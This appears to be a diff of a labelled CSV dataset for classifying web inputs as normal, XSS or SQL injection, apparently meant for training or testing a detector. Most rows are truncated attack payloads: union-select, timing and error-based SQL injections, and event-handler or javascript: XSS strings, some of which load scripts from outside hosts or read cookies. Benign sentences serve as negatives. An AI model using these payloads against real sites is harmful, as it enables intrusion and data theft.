1416 union all select null,null,",2,SQLi,17953 -1' where 9241 = 9241 or 4915 = ( select count ( * ,2,SQLi,16847 -select 'qqpjq'|| ( case 5118 when 5118 then 1 else,2,SQLi,17128 -<svg onpointerup=alert(1)>XSS</svg>,1,XSS,8415 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,22391 -"<nav draggable=""true"" ondragend=""alert(1)"">test</n",1,XSS,8818 -<kbd id=x tabindex=1 onactivate=alert(1)></kbd>,1,XSS,6285 -1' ) where 8586 = 8586 and 3202 = like ( 'abcdefg',2,SQLi,20360 -"1 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c )",2,SQLi,12945 -"<STYLE TYPE=""text/javascript"">alert('');</STYLE>",1,XSS,8537 -1' ) as noqp where 4042 = 4042 or 8315 = ( select ,2,SQLi,15652 -1' ) ) or sleep ( 5 ) and ( ( 'uzhd' like 'uzhd,2,SQLi,12727 -"1"" ) as ltbl where 6395 = 6395",2,SQLi,20580 -Where's the wildlife sanctuary?,0,normal,23593 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10472 -1' ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ),2,SQLi,20271 -<acronym onpointerup=alert(1)>XSS</acronym>,1,XSS,4327 -Container Store: 225% off select closet essentials,0,normal,26269 -"<summary onbeforecut=""alert(1)"" contenteditable>te",1,XSS,8588 -"{""id"":null,""firstName"":""Edmond"",""lastName"":""Tan"",""",0,normal,27131 -"1"" ) ) rlike ( select ( case when ( 7689 = 7689 ) ",2,SQLi,13307 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,22082 -<progress onfocusout=alert(1) tabindex=1 id=x></pr,1,XSS,3642 -1' ) or 8421 = ( select count ( * ) from generate_,2,SQLi,15800 -"</stylesheet>//[""'`-->]]>]</div>",1,XSS,9035 -"Just add ingredients, select the cycle, and push t",0,normal,25934 +AND 1=1 AND '%'=',2,SQLi,10221 +I want to choose a game for family game night.,0,normal,23878 +Find data where available.,0,normal,23303 +<style>:target {color: red;}</style><col id=x styl,1,XSS,8404 +"1%' ) union all select null,null,null#",2,SQLi,17728 +"<frame draggable=""true"" ondragstart=""alert(1)"">tes",1,XSS,8186 +"{""id"":null,""firstName"":""Kirin"",""lastName"":""Swatan""",0,normal,27230 +admin' or '1' = '1,2,SQLi,11429 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4616 +"1 ) and extractvalue ( 7982,concat ( 0x5c,0x717170",2,SQLi,16610 +1%' ) or 8315 = ( select count ( * ) from sysibm.s,2,SQLi,21982 +"<content draggable=""true"" ondragenter=""alert(1)"">t",1,XSS,8596 +1 where 5081 = 5081 or char ( 68 ) ||char ( 69 ) |,2,SQLi,14171 +McDermott will be questioned by parliament's Treas,0,normal,25886 +1'+ ( select 'nzgq' where 7230 = 7230 and elt ( 12,2,SQLi,18927 +"{""id"":null,""firstName"":""Vincent"",""lastName"":""Sim"",",0,normal,26841 +-9281 ) where 8363 = 8363 or make_set ( 8220 = 512,2,SQLi,12193 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,21074 +<menu id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,2910 +1' ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ),2,SQLi,21314 +<noframes id=x tabindex=1 onbeforeactivate=alert(1,1,XSS,8074 +Select your triumph.,0,normal,25009 +1'+ ( select 'vjoj' where 5348 = 5348,2,SQLi,15893 +Select the perfect accessory for your outfit.,0,normal,24181 +"<bgsound oncontextmenu=""alert(1)"">test</bgsound>",1,XSS,5267 +"<p draggable=""true"" ondragenter=""alert(1)"">test</p",1,XSS,6166 +Perhaps the earliest example is to be found in Sel,0,normal,25783 +<style>:target {transform: rotate(180deg);}</style,1,XSS,5484 +select,0,normal,26558 +Select the best camera settings for photos.,0,normal,24051 +<aside onfocusout=alert(1) tabindex=1 id=x></aside,1,XSS,6898 +The select committee will continue its work over t,0,normal,25352 +1' ) where 3450 = 3450 and 8312 = dbms_pipe.receiv,2,SQLi,17196 +1'+ ( select ocvc where 6981 = 6981 union all sele,2,SQLi,14320 +-1910' or 2624 = 3371 and 'umoy' = 'umoy,2,SQLi,13603 +<bdi onpointermove=alert(1)>XSS</bdi>,1,XSS,2652 +Filter the spam calls.,0,normal,22704 +"{""id"":null,""name"":""Guardromon (Gold)""}",0,normal,27492 +<style>:target {color: red;}</style><source id=x s,1,XSS,8792 +-1468' ) ) ) or 4875 = 6163#,2,SQLi,15348 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3193 +")) or ((x""))=((""x",2,SQLi,9897 +-3100' ) or 4144 = ( select upper ( xmltype ( chr ,2,SQLi,12352 +"<picture><source srcset=""validimage.png""><image on",1,XSS,3653 +1' ) ) ) or 8421 = ( select count ( * ) from gener,2,SQLi,18920 +"You can shop select featured deals, and take an ex",0,normal,25087 +The International Olympic Committee will select a ,0,normal,25424 +"<base onmouseup=""alert(1)"">test</base>",1,XSS,5979 +"<input onkeydown=""alert(1)"" contenteditable>test</",1,XSS,3373 +"{""id"":null,""firstName"":""Kenneth"",""lastName"":""Kang""",0,normal,26858 +"1%"" ) ) ) or 8384 = like ( 'abcdefg',upper ( hex (",2,SQLi,19965 +<button onDragLeave=javascript:alert(1)>,1,XSS,9607 +"1%"" and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 1",2,SQLi,21797 +javascript:document.location=,1,XSS,1766 +On the upper agora we use signposts the user can s,0,normal,25836 +"-7661"" union all select 9551,9551,9551#",2,SQLi,20550 +Select the flower.,0,normal,22841 +-9509' ) where 9303 = 9303 order by 1#,2,SQLi,19473 +"1 ) ) and make_set ( 8554 = 3286,3286 ) and ( ( 73",2,SQLi,15632 +<style>:target {color: red;}</style><keygen id=x s,1,XSS,7906 +1 ) and 2716 = ( select count ( * ) from sysusers ,2,SQLi,13337 +"1%"" ) ) ) and make_set ( 8191 = 7813,7813 ) and ( ",2,SQLi,18123 +"1"" where 8333 = 8333",2,SQLi,14695 +1 ) ) ) or 4411 = ( select count ( * ) from sysuse,2,SQLi,13454 +-9739' or 8571 = 8571--,2,SQLi,13996 +"1,SELECT *",2,SQLi,11542 +1 ) where 5025 = 5025,2,SQLi,17955 +"1 ) ) and 3202 = like ( 'abcdefg',upper ( hex ( ra",2,SQLi,16849 +"1' ) ) and extractvalue ( 7982,concat ( 0x5c,0x717",2,SQLi,17130 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8417 +"{""id"":null,""firstName"":""Jiamin"",""lastName"":""Wang"",",0,normal,27142 +<command id=x tabindex=1 onactivate=alert(1)></com,1,XSS,8820 +<meter id=x tabindex=1 onbeforeactivate=alert(1)><,1,XSS,6287 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,20358 +"1' ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ",2,SQLi,12947 +¼script¾alert(¢¢)¼/script¾,1,XSS,8539 +1 ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ,2,SQLi,15654 +"1"" ) ) and make_set ( 1167 = 5027,5027 ) and ( ( """,2,SQLi,12729 +1 ) and 9660 = ( select count ( * ) from all_users,2,SQLi,20578 +Where's the aquarium?,0,normal,23590 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10474 +Find entries where applicable.,0,normal,23293 +"<style>@keyframes x{}</style><th style=""animation-",1,XSS,4329 +"{""id"":null,""firstName"":""Chang"",""lastName"":""Yu"",""sp",0,normal,26957 +<style>:target {color:red;}</style><frameset id=x ,1,XSS,8590 +Create a memorable event.,0,normal,22675 +"1"" where 1166 = 1166",2,SQLi,13309 +Merge the data sources into one file.,0,normal,22971 +<svg><a onload=alert(1)></a>,1,XSS,3644 +1 where 4153 = 4153 and 3715 in ( ( char ( 113 ) +,2,SQLi,15802 +<<scr\0ipt/src=http://xss.com/xss.js></script,1,XSS,9037 +"Just like Editions, only select partners are being",0,normal,25931 <body onload=alert(1)>,1,XSS,22 -<source onpointerdown=alert(1)>XSS</source>,1,XSS,3719 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,13392 -"<picture onkeypress=""alert(1)"" contenteditable>tes",1,XSS,2903 -Sort the jumbled cables.,0,normal,22605 -<q onpointermove=alert(1)>XSS</q>,1,XSS,5535 -""")) and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,11043 -"-1370' ) ) ) or elt ( 1032 = 1032,3623 ) and ( ( (",2,SQLi,15352 +"<rtc onmousemove=""alert(1)"">test</rtc>",1,XSS,3721 +1' ) as mpsf where 3348 = 3348,2,SQLi,13394 +<nav onpointerenter=alert(1)>XSS</nav>,1,XSS,2904 +Modify the game settings.,0,normal,22602 +<svg><ruby onload=alert(1)></ruby>,1,XSS,5537 +""")) and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,11045 +"-9509 ) union all select 1193,1193,1193#",2,SQLi,15354 "<meta charset= ""x-imap4-modified-utf7""&&>&&<script",1,XSS,780 -"1%"" or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ",2,SQLi,19278 -"-5425 where 5933 = 5933 union all select 5933,5933",2,SQLi,22041 -"{""id"":null,""name"":""caught""}",0,normal,27333 -Select a comfortable chair for the meeting.,0,normal,22916 -<table onblur=alert(1) tabindex=1 id=x></table><in,1,XSS,3432 -"-1174"" union all select 4303,4303,4303,4303#",2,SQLi,17208 -1 where 7906 = 7906 or 8156 = ( select count ( * ),2,SQLi,18872 -"<abbr draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,3623 -"<header draggable=""true"" ondragleave=""alert(1)"">te",1,XSS,4260 -"<header draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,4726 -&lt;A HREF=&quot;http://google.com/&quot;&gt;XSS&l,1,XSS,1470 -1' ) ) ) and 6537 = dbms_pipe.receive_message ( ch,2,SQLi,13323 -"-8034"" or 8571 = 8571--",2,SQLi,18928 -Filter the spam calls.,0,normal,22704 -<style>:target {color:red;}</style><map id=x style,1,XSS,8425 +1'|| ( select 'xbwg' where 7518 = 7518 union all s,2,SQLi,19276 +"1 where 1186 = 1186 union all select null,null,nul",2,SQLi,22039 +Where can we go?,0,normal,23480 +Select from the list of available skins the one yo,0,normal,25627 +<style>@keyframes slidein {}</style><canvas style=,1,XSS,3434 +"1' ) ) ) and row ( 6237,7469 ) > ( select count ( ",2,SQLi,17210 +1' ) ) and sleep ( 5 ) and ( ( 'krrr' = 'krrr,2,SQLi,18870 +<dt onpointerout=alert(1)>XSS</dt>,1,XSS,3625 +<progress id=x tabindex=1 onbeforedeactivate=alert,1,XSS,4262 +<basefont id=x tabindex=1 onfocus=alert(1)></basef,1,XSS,4728 +&lt;A HREF=&quot;http://www.google.com./&quot;&gt;,1,XSS,1471 +"-5132%"" ) ) or 3038 = 3038",2,SQLi,13325 +"1"" ) or extractvalue ( 1297,concat ( 0x5c,0x717170",2,SQLi,18926 +Order a Hawaiian pizza.,0,normal,22701 +<col id=x tabindex=1 ondeactivate=alert(1)></col><,1,XSS,8427 "<svg onResize svg onResize=""javascript:javascript:",1,XSS,369 -"Then select Settings, and scroll down to the area ",0,normal,25341 -select * from users where id = 1.<1# union select ,2,SQLi,11786 -"1"" ) ) ) and make_set ( 8403 = 8403,8899 ) and ( (",2,SQLi,13113 -"javascript:""/*'/*`/*--></noscript></title></textar",1,XSS,9492 +"Then, you can select an option to mute that user.",0,normal,25338 +select * from users where id = 1. <@ union select ,2,SQLi,11788 +"1"" ) ) ) or 7552 = ( select count ( * ) from rdb$f",2,SQLi,13115 +"javascript:""/*\""/*`/*' /*</template></textarea></n",1,XSS,9494 "{""id"":null,""name"":""shoulder paint empty""}",0,normal,27504 -"select * from users where id = 1 or "" ( ]"" or 1 = ",2,SQLi,11385 -1 ) ) ) and exp ( ~ ( select * from ( select conca,2,SQLi,19848 -Select the outfit.,0,normal,24797 -"1"" ) as yphz where 8174 = 8174 union all select nu",2,SQLi,18106 -1,0,normal,26739 -"<embed onkeydown=""alert(1)"" contenteditable>test</",1,XSS,4061 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10684 -"<div onkeyup=""alert(1)"" contenteditable>test</div>",1,XSS,1825 -"{""id"":null,""firstName"":""Shirlyn"",""lastName"":""Fang""",0,normal,26898 -"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,10973 -Select your course.,0,normal,24833 -Select begin.,0,normal,24585 -<blink onpointerout=alert(1)>XSS</blink>,1,XSS,3759 -<label onfocusout=alert(1) tabindex=1 id=x></label,1,XSS,3233 -1' and 2316 = 7236,2,SQLi,18303 -<hr id=x tabindex=1 onfocusin=alert(1)></hr>,1,XSS,7247 -1' ) ) as agdn where 8442 = 8442 and 3824 = benchm,2,SQLi,17954 -"<canvas onmousemove=""alert(1)"">test</canvas>",1,XSS,1832 -"<style>@keyframes x{}</style><blockquote style=""an",1,XSS,8540 -"><h1><IFRAME SRC=javascript:alert('XSS');""></IFRAM",1,XSS,1243 -1%' ) ) ) and 9198 = 9198--,2,SQLi,19138 -1 ) where 9078 = 9078 rlike sleep ( 5 ) #,2,SQLi,18782 -"<html draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,4657 -1'|| ( select 'alxi' where 3967 = 3967 and 2388 = ,2,SQLi,19372 --alert(1)-',1,XSS,8999 -select * from users where id = 1. <@ union select ,2,SQLi,11915 -Select a destination for the vacation.,0,normal,24056 -"<meter onmouseenter=""alert(1)"">test</meter>",1,XSS,8344 -"Up to 30% off select men's, women's and kids' swim",0,normal,25217 -"<style>@keyframes x{}</style><ol style=""animation-",1,XSS,8894 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7491 -Select grow.,0,normal,24674 -1 ) ) as rqbo where 2243 = 2243 and exp ( ~ ( sele,2,SQLi,18162 -", begin declare @var varchar ( 8000 ) set @var = '",2,SQLi,11860 -"Since that time select Japanese species, chosen fo",0,normal,25545 -"1"" ) and 3707 = ( select count ( * ) from sysibm.s",2,SQLi,14773 -1%' ) or 9643 = ( select count ( * ) from domain.d,2,SQLi,17607 -"<script onmouseover=""alert(1)"">test</script>",1,XSS,1778 --2364' or 6743 = 7578,2,SQLi,21792 -"1%"" ) ) ) and sleep ( 5 ) #",2,SQLi,15112 -"; if not(substring((select @@version),25,1) <> 8) ",2,SQLi,11134 -1 where 3478 = 3478 ( select ( case when ( 4587 = ,2,SQLi,13073 -"1%"" ) ) ) or sleep ( 5 ) #",2,SQLi,20710 -Where did you find that charming restaurant?,0,normal,23926 -( select ( case when ( 3348 = 1710 ) then 3348 els,2,SQLi,13864 --4384' ) ) ) or 6872 = 6872 and ( ( ( 'ukhl' = 'uk,2,SQLi,14491 -"Under ""Booking Options"" select the option best fit",0,normal,25229 -1 or 9643 = ( select count ( * ) from domain.domai,2,SQLi,17133 -<map onpointerleave=alert(1)>XSS</map>,1,XSS,7272 --6984 order by 1#,2,SQLi,17644 -"1%"" ) or ( select 9173 from ( select count ( * ) ,",2,SQLi,18273 -1'+ ( select 'dpun' where 4760 = 4760,2,SQLi,14780 -"From the top toolbar select ""Tools"" and then selec",0,normal,26156 -"-5959"" or 2477 = 1144",2,SQLi,17096 -"-1963 union all select 6831,6831,6831,6831,6831,68",2,SQLi,12471 -"1%"" ) ) or 8421 = ( select count ( * ) from genera",2,SQLi,16620 -1 ) ) as ojjk where 3687 = 3687 and ( 4833 = 9218 ,2,SQLi,20221 -1'|| ( select 'qjwf' from dual where 3187 = 3187 a,2,SQLi,21766 -select sleep ( 5 ) and 'gajm' = 'gajm,2,SQLi,13661 -"1',iif ( 7475 = 7475,1,1/0 )",2,SQLi,20044 -"<hr onmouseover=""alert(1)"">test</hr>",1,XSS,3294 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11387 +"1"" where 6686 = 6686 or elt ( 6272 = 6272,sleep ( ",2,SQLi,21924 +Sort cards.,0,normal,23053 +1'|| ( select 'ukfj' where 7133 = 7133 union all s,2,SQLi,18108 +1,0,normal,26736 +<rtc onblur=alert(1) tabindex=1 id=x></rtc><input ,1,XSS,4063 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10686 +<marquee id=x tabindex=1 onbeforedeactivate=alert(,1,XSS,1826 +"{""id"":null,""name"":""Lillipup""}",0,normal,26895 +#ERROR!,2,SQLi,10975 +Select your destination.,0,normal,24830 +seriously seriously are realizing league of legend,0,normal,26481 +<html onblur=alert(1) tabindex=1 id=x></html><inpu,1,XSS,3761 +"<tfoot onmouseover=""alert(1)"">test</tfoot>",1,XSS,3235 +1 ) ) ) and 7533 = 7533 and ( ( ( 7740 = 7740,2,SQLi,18305 +"<s oncontextmenu=""alert(1)"">test</s>",1,XSS,7249 +"1%"" ) union all select null,null,null,null,null#",2,SQLi,17956 +"<h1 onpaste=""alert(1)"" contenteditable>test</h1>",1,XSS,1833 +<ul id=x tabindex=1 onfocus=alert(1)></ul>,1,XSS,8542 +><h1><IFRAME SRC=# onmouseover=alert(document.cook,1,XSS,1244 +"1"" order by 1#",2,SQLi,19136 +select,0,normal,26602 +"<marquee onkeydown=""alert(1)"" contenteditable>test",1,XSS,4659 +1' ) ) ( select ( case when ( 5451 = 5451 ) then r,2,SQLi,19370 +"-eval(""window['pro'%2B'mpt'](8)"")-'",1,XSS,9001 +select * from users where id = '1' or \<$ or 1 = 1,2,SQLi,11917 +Select a hairstyle for a special occasion.,0,normal,24053 +"<marquee draggable=""true"" ondragstart=""alert(1)"">t",1,XSS,8346 +Up to 30% off select Solar Panels and Electrical E,0,normal,25214 +<iframe id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,8896 +"<footer draggable=""true"" ondrag=""alert(1)"">test</f",1,XSS,7493 +Select fail.,0,normal,24671 +"1%"" ) ) ) or exp ( ~ ( select * from ( select conc",2,SQLi,18164 +hi' or 1 = 1 --,2,SQLi,11862 +"Smith on the 2nd of July, expressing, on the one h",0,normal,25542 +1'|| ( select 'mlwj' from dual where 4247 = 4247 a,2,SQLi,14775 +1 ) ) ) or 7552 = ( select count ( * ) from rdb$fi,2,SQLi,17609 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,1779 +1 ) as qyic where 9736 = 9736 and elt ( 3114 = 311,2,SQLi,21790 +1%' ) ) ) and 8594 = ( select 8594 from pg_sleep (,2,SQLi,15114 +; if not(select system_user) <> 'sa' waitfor delay,2,SQLi,11136 +1' where 2332 = 2332 or 9643 = ( select count ( * ,2,SQLi,13075 +1' in boolean mode ) rlike ( select * from ( selec,2,SQLi,21151 +Where's the best place to have a picnic?,0,normal,23923 +"1' or 8384 = like ( 'abcdefg',upper ( hex ( random",2,SQLi,13866 +"1"" ) ) union all select null,null,null,null,null,n",2,SQLi,14493 +Unfortunately she came select group of played vip ,0,normal,25226 +1'|| ( select 'yzdz' where 5021 = 5021,2,SQLi,17135 +"<dfn onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,7274 +1' in boolean mode ) and 2853 = cast ( ( chr ( 113,2,SQLi,17646 +"1"" ) or char ( 117 ) ||char ( 111 ) ||char ( 105 )",2,SQLi,18275 +1'+ ( select tart where 9861 = 9861,2,SQLi,14782 +"1%"" ) or sleep ( 5 ) and ( ""%"" = """,2,SQLi,20058 +-6377'|| ( select 'ryin' where 2113 = 2113 union a,2,SQLi,17098 +1%' and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ,2,SQLi,12473 +"1"" ) ) as tncm where 8203 = 8203 and 3707 = ( sele",2,SQLi,16622 +1'|| ( select 'bifa' where 6077 = 6077 and 4547 = ,2,SQLi,20219 +"1%"" and 7533 = 7533 and ""%"" = """,2,SQLi,21764 +"1"" ) ) or 4411 = ( select count ( * ) from sysuser",2,SQLi,13663 +"1"" ) as cnrh where 8524 = 8524 and 3824 = benchmar",2,SQLi,20854 +<animatemotion onpointermove=alert(1)>XSS</animate,1,XSS,3296 "<body onPageHide body onPageHide=""javascript:javas",1,XSS,379 -"select * from users where id = 1 union select .1_,",2,SQLi,11485 -"iif ( 8354 = 3515,1,1/0 )",2,SQLi,14248 -"select * from users where id = 1 or ""?%"" or 1 = 1 ",2,SQLi,11883 -"<nextid onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,3846 -1' ) ) ) and 2716 = ( select count ( * ) from sysu,2,SQLi,15052 -"Scroll down and select ""Redeem gift card or promo ",0,normal,25700 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,13778 -"{""id"":null,""firstName"":""Ng"",""lastName"":""George"",""a",0,normal,26972 -"-7347"" ) ) union all select 4360,4360,4360,4360,43",2,SQLi,18179 -exists,0,normal,23139 -"-2225' union all select 1545,1545,1545,1545#",2,SQLi,13040 -<hgroup id=x tabindex=1 onfocus=alert(1)></hgroup>,1,XSS,5025 -1' ) waitfor delay '0:0:5' and ( 'vtfs' = 'vtfs,2,SQLi,14030 -1'+ ( select 'rryx' where 1228 = 1228 union all se,2,SQLi,12271 -<;SCRIPT>;a=/XSS/,1,XSS,1659 +select * from users where id = 1 %$ 1 or 1 = 1 -- ,2,SQLi,11487 +1' ) ) and 8514 = ( select count ( * ) from domain,2,SQLi,14250 +select * from users where id = '1' union select \.,2,SQLi,11885 +<span id=x tabindex=1 onfocusin=alert(1)></span>,1,XSS,3848 +1 and 6510 = ( select count ( * ) from sysusers as,2,SQLi,15054 +"{""id"":null,""firstName"":""Toh"",""lastName"":""Munsing"",",0,normal,26819 +"-4838' ) ) or 1 group by concat ( 0x7171706a71, ( ",2,SQLi,13780 +"{""id"":null,""firstName"":""Alvin Tak"",""lastName"":""Kho",0,normal,26969 +"1 procedure analyse ( extractvalue ( 9255,concat (",2,SQLi,18181 +and,0,normal,23136 +"1%"" ) ) and make_set ( 9897 = 5557,5557 ) and ( ( ",2,SQLi,13042 +"<style>@keyframes x{}</style><param style=""animati",1,XSS,5027 +"-8238' ) ) union all select 9797,9797,9797,9797,97",2,SQLi,14032 +1 ) and 6240 = ( 'qqpjq'|| ( select case 6240 when,2,SQLi,12273 +"<;SCRIPT a="";>;""; SRC="";http://ha.ckers.org/xss.js",1,XSS,1660 <img src=x onerror=location=atob`amF2YXNjcmlwdDphb,1,XSS,213 -Select the most relevant data for analysis.,0,normal,24043 -"{""id"":null,""firstName"":""Jimmy"",""lastName"":""Ng"",""ad",0,normal,26838 -"-7518"" or elt ( 8413 = 3995,3995 ) and ""cpnf"" = ""c",2,SQLi,15899 -<map onpointerup=alert(1)>XSS</map>,1,XSS,8527 -"1', ( select ( case when ( 4209 = 5879 ) then 1 el",2,SQLi,18551 -"-6407' ) or elt ( 1631 = 4946,4946 ) and ( 'jpnz' ",2,SQLi,15763 -1 ) where 2390 = 2390,2,SQLi,13902 -1' ) as hats where 2011 = 2011 union all select nu,2,SQLi,14196 +Insert the USB stick.,0,normal,22758 +"{""id"":null,""name"":""Scyther""}",0,normal,26835 +1'|| ( select 'xuou' from dual where 7681 = 7681 o,2,SQLi,15901 +"<video ondblclick=""alert(1)"">test</video>",1,XSS,8529 +1' ) or ( select 2* ( if ( ( select * from ( selec,2,SQLi,18553 +1' where 4115 = 4115,2,SQLi,15765 +"-2929"" ) ) ) union all select 8999,8999#",2,SQLi,13904 +-2174' ) ) as zhoz where 4185 = 4185 order by 1#,2,SQLi,14198 "<a href=""jav&#97ascript:javascript:alert(1)"">test1",1,XSS,793 -1 where 3357 = 3357 and ( 9492 = 4334 ) *4334--,2,SQLi,16618 -"1 ) ) ) and make_set ( 8403 = 8403,8899 ) and ( ( ",2,SQLi,20850 -1' ) ) ) and 9198 = 9198--,2,SQLi,19837 -"-5385"" union all select 4577,4577,4577,4577,4577,4",2,SQLi,16594 -"<x '=""foo""><x foo='><img src=x onerror=alert(62)//",1,XSS,9331 -"{""id"":null,""firstName"":""Pauline"",""lastName"":""Fong""",0,normal,27501 -"{""id"":null,""firstName"":""Yong"",""lastName"":""Lynette""",0,normal,26830 -"<kbd draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,4499 -"javascript:""/*'//`//\""//</title></template/</texta",1,XSS,9506 -<image2 onpointerleave=alert(1)>XSS</image2>,1,XSS,2414 -Select appear.,0,normal,24684 +"1%"" ) ) or 8421 = ( select count ( * ) from genera",2,SQLi,16620 +1' ) or 8421 = ( select count ( * ) from generate_,2,SQLi,20848 +"-1483' or make_set ( 9354 = 9354,7185 ) and 'qfil'",2,SQLi,19835 +"-4944%"" ) ) or make_set ( 1084 = 1988,1988 ) and (",2,SQLi,16596 +"<x 1="">"" onxxx=1",1,XSS,9333 +"{""id"":null,""name"":""Birds Of Paradise""}",0,normal,27605 +"{""id"":null,""firstName"":""Evon"",""lastName"":""Choong"",",0,normal,26827 +"<base onpaste=""alert(1)"" contenteditable>test</bas",1,XSS,4501 +"javascript:/*""/*`/*'/*\""/*</script></style></templ",1,XSS,9508 +"<rb onmousedown=""alert(1)"">test</rb>",1,XSS,2415 +Select dim.,0,normal,24681 <sVg><scRipt %00>alert&lpar;1&rpar; {Opera},1,XSS,835 -<a href=javascript:alert(1)>click,1,XSS,9064 -<svg////////onload=alert(1)>,1,XSS,9456 -><script+src=https://appcenter.intuit.com/Account/,1,XSS,9811 -"-9958"" ) as jzvq where 3741 = 3741 union all selec",2,SQLi,12538 -"1%"" ) ) and 8312 = dbms_pipe.receive_message ( chr",2,SQLi,13290 -1' ) ) as plgq where 1121 = 1121,2,SQLi,13164 -"<IMG SRC=x oncuechange=""alert(String.fromCharCode(",1,XSS,1221 -1 ) as vbli where 5139 = 5139 and 2782 = 2625--,2,SQLi,12956 -or 0=0 #,2,SQLi,9958 -"1%"" ) or 5356 = ( select count ( * ) from sysusers",2,SQLi,17415 -"select * from users where id = 1 or 1#"" ( union se",2,SQLi,11376 -"{""id"":null,""firstName"":""Zhang"",""lastName"":""Enlai"",",0,normal,27254 -1 and ( select 2* ( if ( ( select * from ( select ,2,SQLi,18386 -<style>:target {color: red;}</style><br id=x style,1,XSS,5610 -"select * from users where id = 1 or 1#""1 union sel",2,SQLi,11908 -"<cite onmousemove=""alert(1)"">test</cite>",1,XSS,4582 -mid,0,normal,23206 -ORDER BY 20#,2,SQLi,10293 -<button seekSegmentTime=javascript:alert(1)>,1,XSS,9678 -"<footer onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,2524 --9358' or 9887 = 2569--,2,SQLi,14183 -"Lamps Plus: Up to 50% off select furniture, decor ",0,normal,25914 -"<q oncut=""alert(1)"" contenteditable>test</q>",1,XSS,7461 -<applet onpointerup=alert(1)>XSS</applet>,1,XSS,4783 -"<hr onmouseout=""alert(1)"">test</hr>",1,XSS,4382 -"1%"" and 3824 = benchmark ( 5000000,md5 ( 0x7655564",2,SQLi,19078 -"1%"" ) ) ) and 8635 = ( select count ( * ) from gen",2,SQLi,20488 -1' or 5286 = ( select count ( * ) from all_users t,2,SQLi,14436 -<header id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,7643 -"<a draggable=""true"" ondragstart=""alert(1)"">test</a",1,XSS,6453 -1 ) ) as myyh where 5116 = 5116 or 7427 = dbms_pip,2,SQLi,18550 -"<dd onmousedown=""alert(1)"">test</dd>",1,XSS,8810 -"{""id"":null,""name"":""Leavanny""}",0,normal,27352 -"1"" ) ) or 4411 = ( select count ( * ) from sysuser",2,SQLi,19061 -Select your oath.,0,normal,24954 -1 or sleep ( 5 ) -- nrzf,2,SQLi,20855 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10619 -"-6496"" ) as obnf where 2903 = 2903 or make_set ( 9",2,SQLi,14941 -"1"" ) ) as ltco where 3862 = 3862 or 5286 = ( selec",2,SQLi,12963 -"<<SCRIPT>alert("""");//\<</SCRIPT>",1,XSS,7638 -"1%"" ) ) ) ( select ( case when ( 5451 = 5451 ) the",2,SQLi,16034 -1;SELECT%20*,2,SQLi,10197 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6855 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10620 -"))) RLIKE SLEEP(5) AND (((1337"" LIKE ""1337",2,SQLi,11240 -Redirect 302 /a.jpg http://victimsite.com/admin.as,1,XSS,1387 -She will select soon.,0,normal,24455 -`'><script>\x3Bjavascript:alert(1)</script>,1,XSS,556 -"-6440 ) ) ) union all select 3316,3316,3316,3316,3",2,SQLi,18706 -"1%"" ) ) ) and updatexml ( 3393,concat ( 0x2e,0x717",2,SQLi,16705 -<style>:target {transform: rotate(180deg);}</style,1,XSS,3096 -<noscript id=x tabindex=1 onbeforedeactivate=alert,1,XSS,3286 -"admin"" or 1=1",2,SQLi,9931 -"<embed src=""http://corkami.googlecode.com/svn/!svn",1,XSS,9167 -"-1366' or make_set ( 9354 = 9354,7185 ) and 'abre'",2,SQLi,17455 -"<li onmousemove=""alert(1)"">test</li>",1,XSS,7848 -"<FRAMESET><FRAME SRC=\""javascript:alert('XSS');\"">",1,XSS,1314 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11096 -"<blink onmouseenter=""alert(1)"">test</blink>",1,XSS,7451 -Select the perfect outfit for the occasion.,0,normal,24041 -"1"" ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ",2,SQLi,14707 -") AND ELT(1337=1337,SLEEP(5))-- 1337",2,SQLi,11246 -<button onMouseEnter=javascript:alert(1)>,1,XSS,9632 -"<area onkeypress=""alert(1)"" contenteditable>test</",1,XSS,5073 -"1"" ) where 1807 = 1807",2,SQLi,19999 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5276 -"1%"" ) ) and row ( 6237,7469 ) > ( select count ( *",2,SQLi,18654 -to select 